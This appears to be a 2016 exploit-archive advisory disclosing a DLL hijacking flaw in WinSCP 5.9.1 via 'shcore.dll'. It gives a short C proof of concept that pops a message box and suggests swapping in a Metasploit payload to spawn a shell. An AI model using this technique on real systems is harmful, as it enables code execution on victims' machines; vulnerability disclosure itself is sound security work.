WinSCP 5.9.1 DLL Hijacking
Posted on 09 September 2016
# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll) # Date: 03-09-2016 # Author: Ashiyane Digital Security Team # Vendor Homepage:http://winscp.net/ # Software Link: http://winscp.net/download/WinSCP-5.9.1-Setup.exe # Version:5.9.1 # Tested on:Windows 7 # Exploit by : Amir.ght #+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+# Vuln DLL: shcore.dll WinSCP is an open source free SFTP client, FTP client, WebDAV client and SCP client for Windows. Its main function is file transfer between a local and a remote computer. WinSCP.exe will search for an load any DLL named "shcore.dll". If an attacker can place the DLL in a location where victim open WinSCP.exe it will load and run the attackers DLL and code. also can generate a msfpayload DLL and spawn a shell, for example. #+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+ # Exploit: 1- Save and compile below C code as 'shcore.dll' to create vuln DLL 2- Place 'shcore.dll' on Same Directory of WinSCP 3- Open WinSCP.exe //gcc test.c -o shcore.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; } ################################# Discovered By : Amir.ght ####### #################################
